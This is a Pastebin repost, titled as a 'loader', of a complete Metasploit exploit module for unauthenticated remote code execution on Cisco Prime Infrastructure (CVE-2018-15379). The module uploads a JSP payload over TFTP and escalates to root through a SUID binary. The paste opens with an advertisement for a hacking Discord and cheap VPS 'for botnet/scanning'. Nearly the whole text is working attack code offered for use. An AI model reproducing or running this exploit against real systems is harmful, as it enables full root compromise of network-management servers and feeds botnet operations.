SHARE
TWEET

[CISCO PRIME INFRASTRUCTURE LOADER] UPDATE 15/11/18

xB4ckdoorREAL Nov 15th, 2018 285 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #DISCORD [FOR SPOTS/SOURCE/SETUP/HACKING] : https://discord.gg/QDy3bUy OR SKYPE: b4ckdoor.porn [Vps for botnet/scanning allowed cheap price.]
  2.  
  3.  
  4. # This module requires Metasploit: https://metasploit.com/download
  5. # Current source: https://github.com/rapid7/metasploit-framework
  6. ##
  7.  
  8. class MetasploitModule < Msf::Exploit::Remote
  9.   Rank = ExcellentRanking
  10.  
  11.   include Msf::Exploit::Remote::HttpClient
  12.   include Msf::Exploit::EXE
  13.   include Msf::Exploit::FileDropper
  14.  
  15.   def initialize(info = {})
  16.     super(update_info(info,
  17.       'Name'           => 'Cisco Prime Infrastructure Unauthenticated Remote Code Execution',
  18.       'Description'    => %q{
  19.         Cisco Prime Infrastructure (CPI) contains two basic flaws that when exploited allow
  20.         an unauthenticated attacker to achieve remote code execution. The first flaw is a file
  21.         upload vulnerability that allows the attacker to upload and execute files as the Apache
  22.         Tomcat user; the second is a privilege escalation to root by bypassing execution restrictions
  23.         in a SUID binary.
  24.  
  25.         This module exploits these vulnerabilities to achieve unauthenticated remote code execution
  26.         as root on the CPI default installation.
  27.  
  28.         This module has been tested with CPI 3.2.0.0.258 and 3.4.0.0.348. Earlier and later versions
  29.         might also be affected, although 3.4.0.0.348 is the latest at the time of writing.
  30.         The file upload vulnerability should have been fixed in versions 3.4.1 and 3.3.1 Update 02.
  31.       },
  32.       'Author'         =>
  33.         [
  34.           'Pedro Ribeiro <pedrib[at]gmail.com>'        # Vulnerability discovery and Metasploit module
  35.         ],
  36.       'License'        => MSF_LICENSE,
  37.       'References'     =>
  38.         [
  39.           [ 'CVE', '2018-15379' ],
  40.           [ 'URL', 'https://seclists.org/fulldisclosure/2018/Oct/19'],
  41.           [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/cisco-prime-infrastructure.txt' ],
  42.           [ 'URL', 'https://blogs.securiteam.com/index.php/archives/3723' ],
  43.           [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181003-pi-tftp' ]
  44.         ],
  45.       'Platform'       => 'linux',
  46.       'Arch'           => [ARCH_X86, ARCH_X64],
  47.       'Targets'        =>
  48.         [
  49.           [ 'Cisco Prime Infrastructure < 3.4.1 & 3.3.1 Update 02', {} ]
  50.         ],
  51.       'Privileged'     => true,
  52.       'DefaultOptions' => { 'WfsDelay' => 10 },
  53.       'DefaultTarget'  => 0,
  54.       'DisclosureDate' => 'Oct 04 2018'
  55.     ))
  56.  
  57.     register_options(
  58.       [
  59.         OptPort.new('RPORT', [true, 'The target port', 443]),
  60.         OptPort.new('RPORT_TFTP', [true, 'TFTPD port', 69]),
  61.         OptBool.new('SSL', [true, 'Use SSL connection', true]),
  62.         OptString.new('TARGETURI', [ true,  "swimtemp path", '/swimtemp'])
  63.       ])
  64.   end
  65.  
  66.  
  67.   def check
  68.     res = send_request_cgi({
  69.       'uri'    => normalize_uri(datastore['TARGETURI'], 'swimtemp'),
  70.       'method' => 'GET'
  71.     })
  72.  
  73.     unless res
  74.       vprint_error 'Connection failed'
  75.       return CheckCode::Unknown
  76.     end
  77.  
  78.     if res.code == 404 && res.body.length == 0
  79.       # at the moment this is the best way to detect
  80.       # a 404 in swimtemp only returns the error code with a body length of 0,
  81.       # while a 404 to another webapp or to the root returns code plus a body with content
  82.       return CheckCode::Detected
  83.     end
  84.  
  85.     CheckCode::Safe
  86.   end
  87.  
  88.  
  89.   def upload_payload(payload)
  90.     lport = datastore['LPORT'] || (1025 + rand(0xffff-1025))
  91.     lhost = datastore['LHOST'] || "0.0.0.0"
  92.     remote_file = rand_text_alpha(5..16) + '.jsp'
  93.  
  94.     tftp_client = Rex::Proto::TFTP::Client.new(
  95.       "LocalHost"  => lhost,
  96.       "LocalPort"  => lport,
  97.       "PeerHost"   => rhost,
  98.       "PeerPort"   => datastore['RPORT_TFTP'],
  99.       "LocalFile"  => "DATA:#{payload}",
  100.       "RemoteFile" => remote_file,
  101.       "Mode"       => 'octet',
  102.       "Context"    => {'Msf' => self.framework, 'MsfExploit' => self},
  103.       "Action"     => :upload
  104.     )
  105.     print_status "Uploading TFTP payload to #{rhost}:#{datastore['TFTP_PORT']} as '#{remote_file}'"
  106.     tftp_client.send_write_request
  107.  
  108.     remote_file
  109.   end
  110.  
  111.   def generate_jsp_payload
  112.     exe = generate_payload_exe
  113.     base64_exe = Rex::Text.encode_base64(exe)
  114.  
  115.     native_payload_name = rand_text_alpha(3..9)
  116.  
  117.     var_raw     = rand_text_alpha(3..11)
  118.     var_ostream = rand_text_alpha(3..11)
  119.     var_pstream = rand_text_alpha(3..11)
  120.     var_buf     = rand_text_alpha(3..11)
  121.     var_decoder = rand_text_alpha(3..11)
  122.     var_tmp     = rand_text_alpha(3..11)
  123.     var_path    = rand_text_alpha(3..11)
  124.     var_tmp2    = rand_text_alpha(3..11)
  125.     var_path2   = rand_text_alpha(3..11)
  126.     var_proc2   = rand_text_alpha(3..11)
  127.  
  128.     var_proc1 = rand_text_alpha(3..11)
  129.     chmod = %Q|
  130.     Process #{var_proc1} = Runtime.getRuntime().exec("chmod 777 " + #{var_path} + " " + #{var_path2});
  131.     Thread.sleep(200);
  132.     |
  133.  
  134.     var_proc3 = Rex::Text.rand_text_alpha(3..11)
  135.     cleanup = %Q|
  136.     Thread.sleep(200);
  137.     Process #{var_proc3} = Runtime.getRuntime().exec("rm " + #{var_path} + " " + #{var_path2});
  138.     |
  139.  
  140.     jsp = %Q|
  141.     <%@page import="java.io.*"%>
  142.     <%@page import="sun.misc.BASE64Decoder"%>
  143.     <%
  144.     try {
  145.       String #{var_buf} = "#{base64_exe}";
  146.       BASE64Decoder #{var_decoder} = new BASE64Decoder();
  147.       byte[] #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString());
  148.  
  149.       File #{var_tmp} = File.createTempFile("#{native_payload_name}", ".bin");
  150.       String #{var_path} = #{var_tmp}.getAbsolutePath();
  151.  
  152.       BufferedOutputStream #{var_ostream} =
  153.         new BufferedOutputStream(new FileOutputStream(#{var_path}));
  154.       #{var_ostream}.write(#{var_raw});
  155.       #{var_ostream}.close();
  156.  
  157.       File #{var_tmp2} = File.createTempFile("#{native_payload_name}", ".sh");
  158.       String #{var_path2} = #{var_tmp2}.getAbsolutePath();
  159.  
  160.       PrintWriter #{var_pstream} =
  161.         new PrintWriter(new FileOutputStream(#{var_path2}));
  162.       #{var_pstream}.println("!#/bin/sh");
  163.       #{var_pstream}.println("/opt/CSCOlumos/bin/runrshell '\\" && " + #{var_path} + " #'");
  164.       #{var_pstream}.close();
  165.       #{chmod}
  166.  
  167.       Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path2});
  168.       #{cleanup}
  169.     } catch (Exception e) {
  170.     }
  171.     %>
  172.     |
  173.  
  174.     jsp = jsp.gsub(/\n/, '')
  175.     jsp = jsp.gsub(/\t/, '')
  176.     jsp = jsp.gsub(/\x0d\x0a/, "")
  177.     jsp = jsp.gsub(/\x0a/, "")
  178.  
  179.     return jsp
  180.   end
  181.  
  182.  
  183.   def exploit
  184.     jsp_payload = generate_jsp_payload
  185.  
  186.     jsp_name = upload_payload(jsp_payload)
  187.  
  188.     # we land in /opt/CSCOlumos, so we don't know the apache directory
  189.     # as it changes between versions... so leave this commented for now
  190.     # ... and try to find a good way to clean it later
  191.     print_warning "#{jsp_name} must be manually removed from the Apache in /opt/CSCOlumos"
  192.     # register_files_for_cleanup(jsp_name)
  193.  
  194.     print_status("#{peer} - Executing payload...")
  195.     send_request_cgi({
  196.       'uri'    => normalize_uri(datastore['TARGETURI'], jsp_name),
  197.       'method' => 'GET'
  198.     })
  199.  
  200.     handler
  201.   end
  202. end
  203.  
  204. # 2018-11-15#
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top